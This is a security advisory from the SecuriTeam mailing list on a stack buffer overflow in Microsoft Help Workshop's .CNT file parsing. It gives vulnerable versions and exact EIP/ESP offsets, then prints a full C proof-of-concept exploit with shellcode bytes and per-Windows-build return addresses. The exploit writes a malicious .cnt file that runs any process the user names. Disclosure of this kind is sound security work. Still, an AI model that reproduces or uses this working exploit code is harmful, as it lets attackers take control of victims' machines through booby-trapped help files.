The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Microsoft Help Workshop CNT Contents Files Buffer Overflow
------------------------------------------------------------------------
SUMMARY
Microsoft Help Workshop is standard component of Microsoft Visual Studio
6.0 and 2003 (.NET) for building and managing help projects and could be
also downloaded alone from the Microsoft download center.
There is a stack based memory corruption in Microsoft Help Workshop while
processing .CNT Help Contents files.
DETAILS
Vulnerable Systems:
* Microsoft Help Workshop v4.03.0002
* Microsoft Visual Studio 6.0 SP6
* Microsoft Visual Studio 2003 (.Net)
An attacker must construct malformed .cnt file and induce victim to open
it with the tool, or if Help Workshop has been launched in the past (after
first launch it associates the .cnt files with itself), to launch the
malicious file by doubleclicking/selecting for editing.
The stack based buffer overflow occurs in Microsoft Help Workshop while
processing .cnt files.Each potentialy vulnerable line is constructed with
the "%d %s" format, example:
1 SomeContentsDescription
and placed by the program before processing in the static buffer, which
overflows itself because of lack of input data boundary check.
When the overflow occurs, the EIP register value is set to the DWORD value
placed 526 bytes counting from the beginning of 'SomeContentsDescription'
string. The ESP is set to DWORD value placed 534 bytes counting from the
beggining of the string. The process control can be therefore intercepted
by the attacker by redirecting the instruction flow to the attackers
provided code within the .cnt file.
Proof of concept exploit, after compiled, it will produce .cnt exploit
files that after succesfull exploitation should spawn user specified
process (by default notepad.exe), in the user specified OS enviroment.
The exploit can be also found at:
<www.anspi.pl/~porkythepig/visualization/cnt-expl1.cpp>
www.anspi.pl/~porkythepig/visualization/cnt-expl1.cpp
Exploit:
/////////////////////////////////////////////////////////////
//*****************
//
// PoC exploit for .cnt files buffer overflow vulnerability in
// Microsoft Help Workshop v4.03.0002
// The tool is standard component of MS Visual Studio v6.0, 2003 (.NET)
//
// vulnerability found / exploit built by porkythepig
//
//*****************
#include "stdio.h"
#include "stdlib.h"
#include "string.h"
#include "memory.h"
#define STR01 "0 Microsoft Help Workshop PoC exploit by porkythepig "
#define DEF_SPAWNED_PROCESS "notepad.exe"
#define EXPL_SIZE 619
#define PROC_NAM_SIZ 66
#define RET_OFFSET 0x210
#define PROC_NAME_OFFSET 0x228
#define BACK_SEQ_OFFSET 0x218
#define EXPRO_OFFSET 0xbf
#define GETSTAR_OFFSET 0x4a
#define CREPRO_OFFSET 0xb5
#define GETWINDIR_OFFSET 0x65
typedef struct
{
unsigned int extPro;
unsigned int getStarInf;
unsigned int crePro;
unsigned int getWinDir;
unsigned int jmpEspPtr;
}ApiPtrs;
ApiPtrs osApiPtrs[5]=
{
0x793f69da,0x793f6b7a,0x793f5010,0x793f2d23,0x7cfdbd1b,
0x7c4ee01a,0x7c4f49df,0x7c4fc0a0,0x7c4e9cFF,0x784452e4,
0x7c5969da,0x7c596b7a,0x7c595010,0x7c592d23,0x7d0812e4,
0x7c81cdda,0x7c801eee,0x7c802367,0x7c821363,0x7cc58fd8,
0x77e75cb5,0x77e6177a,0x77e61bb8,0x77e705b0,0x775e6247
};
unsigned char shlCode[]=
{
0x66,0x83,0xc4,0x10,0x8b,0xc4,0x66,0x81,
0xec,0x10,0x21,0x50,0x66,0x2d,0x11,0x11,
0x50,0xb8,0x7a,0x6b,0x3f,0x79,0xff,0xd0,
0x58,0x50,0x80,0x38,0x20,0x74,0x49,0x5b,
0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,
0xeb,0x11,0x05,0x53,0xb8,0x23,0x2d,0x3f,
0x79,0x3c,0xff,0x75,0x02,0x32,0xc0,0xff,
0xd0,0x58,0x50,0x66,0x2d,0x11,0x05,0x32,
0xdb,0x38,0x18,0x74,0x03,0x40,0xeb,0xf9,
0x5b,0x53,0x32,0xd2,0xb1,0x5c,0x88,0x08,
0x40,0x38,0x13,0x74,0x08,0x8a,0x0b,0x88,
0x08,0x43,0x40,0xeb,0xf4,0x32,0xd2,0x88,
0x10,0x58,0x50,0x66,0x2d,0x11,0x05,0x48,
0x40,0x8b,0xd0,0x58,0x50,0x66,0x2d,0x11,
0x11,0x50,0x33,0xc9,0x51,0x51,0x51,0x51,
0x51,0x51,0x51,0x52,0xb8,0x10,0x50,0x3f,
0x79,0xff,0xd0,0x33,0xc0,0x50,0xb8,0xda,
0x69,0x3f,0x79,0xff,0xd0
};
unsigned char backSeq[]=
{
0xe9,0x1b,0xfe,0xff,0xff
};
char buf0[EXPL_SIZE];
char spawnProcess[PROC_NAM_SIZ];
char *outName;
int osId;
int defProc;
void CompileBuffer()
{
int ptr=0;
memset(buf0,'1',EXPL_SIZE);
ptr+=sprintf(buf0,"%s",STR01);
memcpy(buf0+ptr,shlCode,sizeof(shlCode));
memcpy(buf0+BACK_SEQ_OFFSET,backSeq,sizeof(backSeq));
*((unsigned int*)(buf0+EXPRO_OFFSET))=osApiPtrs[osId].extPro;
*((unsigned
int*)(buf0+GETSTAR_OFFSET))=osApiPtrs[osId].getStarInf;
*((unsigned int*)(buf0+CREPRO_OFFSET))=osApiPtrs[osId].crePro;
*((unsigned
int*)(buf0+GETWINDIR_OFFSET))=osApiPtrs[osId].getWinDir;
*((unsigned int*)(buf0+RET_OFFSET))=osApiPtrs[osId].jmpEspPtr;
ptr=PROC_NAME_OFFSET;
if(!defProc)
{
buf0[ptr]=32;
ptr++;
}
sprintf(buf0+ptr,"%s",spawnProcess);
printf("Exploit buffer compiled\n");
}
void WriteBuffer()
{
FILE *o;
o=fopen(outName,"wb");
if(o==NULL)
{
printf("Cannot open file for writing\n");
exit(0);
}
fwrite(buf0,EXPL_SIZE,1,o);
fclose(o);
printf("Output .cnt file [ %s ] built successfully\n",outName);
}
void ProcessInput(int argc, char* argv[])
{
printf("\nMicrosoft Help Workshop 4.03.0002 .cnt files
exploit\n");
printf("Vulnerability found & exploit built by porkythepig\n");
if(argc<3)
{
printf("Syntax: exploit.exe os outName [spawnProc]\n");
printf("[ os ] host OS, possible choices:\n");
printf(" 0 Windows 2000 SP4 [Polish]
updates on 11.01.2007\n");
printf(" 1 Windows 2000 SP4
[English]\n");
printf(" 2 Windows 2000 SP4 [English]
updates on 11.01.2007\n");
printf(" 3 Windows XP Pro SP2 [English]
updates on 11.01.2007\n");
printf(" 4 Windows XP Pro [English]\n");
printf("[ outName ] output .cnt exploit file name\n");
printf("[ spawnProc ] *optional* full path to the process
to be spawned by\n");
printf(" the exploit (if none specified
default will be notepad.exe)\n");
exit(0);
}
osId=atol(argv[1]);
if((osId<0)||(osId>4))
{
exit(0);
}
outName=argv[2];
if(argc>3)
{
if(strlen(argv[3])>=PROC_NAM_SIZ)
{
exit(0);
}
strcpy(spawnProcess,argv[3]);
defProc=0;
}
else
{
strcpy(spawnProcess,DEF_SPAWNED_PROCESS);
defProc=1;
}
}
int main(int argc, char* argv[])
{
ProcessInput(argc,argv);
CompileBuffer();
WriteBuffer();
return 0;
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:porkythepig@anspi.pl>
porkythepig.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
